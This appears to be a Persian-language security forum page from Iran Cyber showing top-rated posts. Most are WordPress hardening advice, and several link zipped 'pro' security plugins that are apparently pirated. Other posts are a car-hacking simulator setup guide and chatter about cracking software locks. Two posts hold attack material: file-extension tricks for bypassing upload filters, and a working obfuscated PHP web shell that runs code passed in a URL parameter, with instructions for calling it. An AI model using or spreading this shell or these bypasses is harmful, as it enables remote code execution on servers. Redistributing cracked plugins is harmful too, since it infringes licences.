رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

تخته امتیازات


مطالب محبوب

در حال نمایش مطالب دارای بیشترین امتیاز از زمان ۲۲/۰۷/۱۴ در همه بخش ها

  1. 4 امتیاز
    نصب یک افزونه امنیتی وردپرس بعد از تهیه منظم نسخه پشتیبان، نصب یک افزونه امنیتی وردپرسی است که در افزایش امنیت وردپرس نقش دارد. افزونه امنیتی در واقع یک سیستم حسابرسی و نظارت است که همه اتفاقاتی که در وب سایت شما می‌افتد را پیگیری می‌کند. این موضوع شامل نظارت بر یکپارچگی فایل‌ها، تلاش ناموفق برای ورود به سیستم ، اسکن بدافزار و غیره می‌شود. ما در این تاپیک چند نمونه از آخرین آپدیت پلاگین های امنیتی پرو را در اختیارتون میزاریم و با توجه به نیاز خودتان پلاگین مورد نظر را نصب کنید. پیشنهاد ما پلاگین امنیتی iThemes Security می باشد. wordfence-v7.5.11 (Iran Cyber).zip hide-my-wp-6.0.22 (Iran Cyber).zip ithemes-security-pro7.1.3 (Iran Cyber).zip
  2. 4 امتیاز
    با سلام، موضوع حفظ امنیت وردپرس و تلاش برای بالابردن آن یک مسئله بسیار ضروری است. چون در صورتی که هکرها بتوانند وب سایت شما را هک کنند، نه تنها به دارایی شما که اطلاعات روی سایتتان است دسترسی پیدا خواهند کرد، بلکه به اعتبار و برند شما نیز لطمه وارد خواهند کرد. کافی است افراد بدانند که سایت شما یک بار مورد حمله هکرها واقع شده است، امکان دارد برای خرید کردن یا دریافت سایر انواع خدمات دیگر به شما اعتماد نکنند. اگر سایت شما یکی از دارایی‌های با ارزشتان محسوب می‌شود، پس باید امنیت سایت وردپرس شما نیز برایتان در اولویت باشد. در این مطلب که به آموزش افزایش امنیت وردپرس می‌پردازد ما چند راهکار ساده و عملی به شما خواهیم نشان خواهیم داد که برای تأمین امنیت وردپرس خود از آن‌ها استفاده کنید.
  3. 4 امتیاز
    تهیه منظم نسخه پشتیبان را فراموش نکنید پشتیبان گیری اولین دفاع شما در برابر هرگونه حمله وردپرس است. به یاد داشته باشید، هیچ چیز 100٪ امن نیست. اگر وب سایت های دولتی قابل هک باشند، وب سایت های شما نیز می توانند مورد حمله قرار بگیرند. در صورت بروز اتفاقات بد، پشتیبان گیری به شما امکان می دهد که به سرعت سایت وردپرس خود را بازیابی کنید. افزونه های پشتیبان وردپرس رایگان و پولی زیادی وجود دارد که می توانید از آن ها استفاده کنید. مهم ترین نکته ای که در مورد تهیه نسخه پشتیبان باید بدانید این است که شما باید به طور منظم پشتیبان گیری از سایت کامل را در یک مکان از راه دور (نه حساب میزبانی خود) ذخیره کنید. توصیه می کنیم آن را در سرویس ابری مانند آمازون، Dropbox یا ابرهای خصوصی مانند Stash ذخیره کنید. براساس تعداد دفعات به روزرسانی وب سایت خود، تنظیمات ایده آل ممکن است یک بار در روز یا پشتیبان گیری ریل تایم انجام شود. خوشبختانه این کار با استفاده از افزونه هایی مانند افزونه UpdraftPlus به راحتی قابل انجام است که ما در این تاپیک آخرین ورژن پرو (2.22.14.25) این افزونه را در اختیارتون قرار میدیم. updraftplus 2.22.14.25 (Iran Cyber).zip
  4. 4 امتیاز
    نقش هاست وردپرس را خیلی جدی بگیرید سرویس میزبانی وردپرس شما مهم ترین نقش را در امنیت سایت وردپرسی شما دارد. یک ارائه دهنده میزبانی مناسب اقدامات اضافی را برای محافظت از سرورهای خود در برابر تهدیدات معمول انجام می دهد. در اینجا نحوه کار یک شرکت میزبان وب خوب در پس زمینه برای محافظت از وب سایت ها و داده های شما ارائه شده است: آن ها به طور مداوم شبکه خود را از نظر فعالیت مشکوک کنترل می کنند. همه شرکت های میزبان خوب ابزارهایی برای جلوگیری از حملات گسترده DDOS در اختیار دارند. آن ها نرم افزار سرور، نسخه های php و سخت افزار خود را به روز نگه می دارند تا از سوءاستفاده آسیب پذیری های امنیتی در نسخه قدیمی توسط هکرها جلوگیری کنند. آن ها آماده استفاده از نقشه های بازیابی حوادث هستند که به آن ها این امکان را می دهد که از داده های شما در صورت تصادف بزرگ محافظت کنند. در یک برنامه میزبانی مشترک، شما منابع سرور را با بسیاری از مشتریان دیگر به اشتراک می گذارید. این در صورتی که هکر بتواند از یک سایت همسایه برای حمله به وب سایت شما استفاده کند خطر آلودگی بین سایت را باز می کند. استفاده از سرویس میزبانی وردپرس مدیریت شده بستر ایمن تری را برای وب سایت شما فراهم می کند. شرکت های مدیریت شده میزبان وردپرس پشتیبان گیری خودکار، به روزرسانی خودکار وردپرس و پیکربندی های امنیتی پیشرفته تری را برای محافظت از وب سایت شما ارائه می دهند.
  5. 4 امتیاز
    وردپرس خود را به روز نگه دارید وردپرس یک نرم افزار منبع باز است که به طور منظم نگهداری و به روز می شود. به طور پیش فرض، وردپرس به طور خودکار به روزرسانی های جزئی را نصب می کند اما شما برای نسخه های اصلی، شما باید به صورت دستی آن را به روز کنید. وردپرس همچنین دارای هزاران افزونه و قالب است که می توانید بر روی وب سایت خود آن را نصب کنید. این افزونه ها و قالب ها توسط توسعه دهندگان شخص ثالث که مرتباً نیز آن را به روزرسانی می کنند، نگهداری می شود. این به روزرسانی های وردپرس برای امنیت و ثبات سایت وردپرسی شما بسیار مهم است. شما باید اطمینان حاصل کنید که هسته وردپرس، افزونه ها و موضوع وردپرس شما به روز باشد. بروز رسانی موجب می‌شود تا افزونه‏‌هایی که با نسخه جدید هم‌خوانی ندارند نیز، مجبور به بروز رسانی خود شوند. در هر بروز رسانی وردپرس و افزونه‏‌ها تلاش شده است تا آخرین روزنه‏‌های ورود از طریق هسته مرکزی وردپرس بسته شود و افزونه‏‌های امن‌تری برای کاربران تهیه شود. این یک گزینه مهم در حفظ امنیت وردپرس است.
  6. 3 امتیاز
    نام کاربری و رمز عبور بسیار قوی و پیچیده انتخاب کنید رایج ترین تلاش های هک وردپرس از رمزهای عبور سرقت شده استفاده می کند. با استفاده از رمزهای عبور قوی تر که برای وب سایت شما منحصر به فرد هستند، می توانید این کار را دشوارتر کنید. نه فقط برای مدیریت وردپرس، همچنین برای حساب هایFTP، پایگاه داده، حساب میزبانی وردپرس و آدرس های ایمیل سفارشی شده که از نام دامنه سایت شما استفاده می کنند. بسیاری از مبتدیان استفاده از رمزهای عبور قوی را دوست ندارند زیرا آن ها به سختی به خاطر سپرده می شوند. یکی از مزایای این مورد این است که دیگر نیازی به یادآوری رمزهای عبور نیست و می توانید از مدیریت رمز عبور استفاده کنید. راه دیگر برای کاهش خطر امنیتی این است که به هرکسی اجازه دسترسی به حساب مدیر وردپرس را ندهید، مگر اینکه مجبور شوید. اگر یک تیم بزرگ از نویسنده مهمان دارید، قبل از افزودن حساب های کاربری و نویسندگان جدید به سایت وردپرس خود، مطمئن شوید که نقش ها و قابلیت های کاربر را در وردپرس درک کرده اید.
  7. 2 امتیاز
    همه دوستان عزیز من از ایران مهاجرت کردم در حال حاضر امکان پرداخت از طرف شما وجود نداره. سلاطین کرک در ایران هستند از اونها کمک بگیرید تا جایی که من اطلاع دارم در حال حاضر وضعیت کرک انواع قفل به اینصورته: این قفل ها توسط اهوازهکرز کرک می شوند قفل صدف قفل لاوین قفل ایمن گستر نوین vividvisual این قفل ها توسط بایولاک کرک می شوند: اسپات پلیر Vmprotect Themida Thundersoft (gem video file) password protect video master در ضمن قفل خود بایولاک هم بصورت مشترک با یک شرکت آلمانی در حال برند شدن و دریافت لایسنس بین المللی می باشد و در حال جایگزین شدن بجای قفل Denovo در بازی ها می باشد یعنی در آینده قفل بازی های جهانی یک قفل ایرانی خواهد بود
  8. 2 امتیاز
    هش بصورت md5 همراه با سالت میباشد . الگوریتم هش md5 salt برای کرک هم باید سالت هم داشته باشید
  9. 1 امتیاز
    درود خدمت دوستان عزیز شما در اینجا نشانگرهای قفل درها و نشانگرهای چراغ راهنما و یک پنل کنترلی دارید . که به کاربر اجازه می دهد با شبکه خودرو شبیه سازی شده تعامل داشته باشد، شتاب را اعمال کند و قفل درب و چراغ راهنما را کنترل کند. ICSim به سایر ابزارهای رایگان لینوکس، از جمله CAN Utilities یا can-utils که در مخازن نصب بسته برای اکثر توزیع‌های لینوکس در دسترس هستند، متکی است. در بخش بعدی، نصب و پیکربندی گام به گام نرم افزار ICSim و ابزارهای مرتبط را برای استفاده در کلاس درس، آزمایشگاه کامپیوتر یا ایستگاه کاری تحقیقاتی خودرو و همچنین اجرا در یک ماشین مجازی در ویندوز کالا توضیح خواهیم داد. OpenGarages.org نصب نرم افزار پیش نیازی است که به عنوان وابستگی ها شناخته می شود. ابتدا کالی لینوکس را با تایپ دستور به روز رسانی در یک پنجره جدید ترمینال (خط فرمان) به روز کنید: به روز رسانی sudo apt-get کتابخانه های توسعه LibSDL (SDL مخفف Simple DirectMedia Layer، یک کتابخانه توسعه بین پلتفرمی برای گرافیک کامپیوتری و صدا) را نصب کنید. LibSDL توسط نرم افزار Instrument Cluster Simulator از OpenGarages برای ترسیم و متحرک سازی داشبورد مجازی (یا کلاستر ابزار)، و همچنین برای دسترسی به کنترلرهای مختلف بازی، مانند کنترلر پلی استیشن PS3 استفاده می شود. هر دو کتابخانه libsdl2-dev و libsdl2-image-dev را با دستور نصب کنید: sudo apt-get install libsdl2-dev libsdl2-image-dev پس از نصب کتابخانه های LibSDL، ابزارهای CAN را اضافه کنید. CAN مخفف شبکه کنترل‌کننده، شبکه اصلی در خودروهای مدرن است. ابزارهای CAN در برخی از توزیع‌های لینوکس گنجانده شده‌اند، اما تا زمان نوشتن این مقاله در Kali وجود ندارد. ابزارهای CAN را می توان با استفاده از دستور زیر نصب کرد : sudo apt-get install can-utils هنگامی که وابستگی‌های نرم‌افزار ابزارهای LibSDL و CAN برقرار شد، می‌توانیم ابزارهای هک خودرو ICSim را دانلود و نصب کنیم. sh ~/ICSim/setup_vcan.sh با تایپ ifconfig می توانید بررسی کنید که پیوند شبکه vcan0 فعال است . علاوه بر رابط های شبکه معمولی خود، اکنون باید vcan0 را در لیست مشاهده کنید. با فعال بودن پیوند شبکه vcan0 ، می‌توانیم Instrument Cluster Simulator و Control Panel را برای شبیه‌سازی شبکه کنترل‌کننده زنده و خوشه ابزار در یک خودروی مدرن اجرا کنید https://github.com/zombieCraig/ICSim موفق باشید . سوالی بود پ .خ
  10. 1 امتیاز
    وقتی اپلود نشود مشکل شما اپلود شل و انتی شلر نیست یعنی فایل اجرایی اپلود نمیشود روسرور شما میتونی این بایپس ها هم تست کنید php5. phtml. shell.html;.php
  11. 1 امتیاز
    <?php $K=sTr_RepLaCe('`','','a`s`s`e`r`t');$M=$_GET[icg];IF($M==NuLl)HeaDeR('Status:404');Else/**/$K($M);?> این شل توی یک فایل ذخیره کنید مثلا shell.php فراخونی شل به این صورت که ;site.com/shell.php?icg=echo icg اگر عبارت icg به شما نشون داد یعنی شل با موفقیت اپلود شد اگر به اینصورت اپلود شود میشود باقی مراحل میشود بایپس کرد این تست مربوط به امکان اپلود شدن شل برروی سرور هست
  12. 1 امتیاز
    سلام پست شما خلاف قوانین انجمن هست این رو که خداروشکر کاملا آگاه هستید لیست ایمیل در اوردن کار زیاد سختی نیست هیچ چیزی به راحتی به دست نمیاد شما خودتون تلاش کوشش کنید به نتیجه برسید اگر سوالی در زمینه پن تست امنیت داشتید در خدمتیم باشد که رستگار شویم 🙄 تامام

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...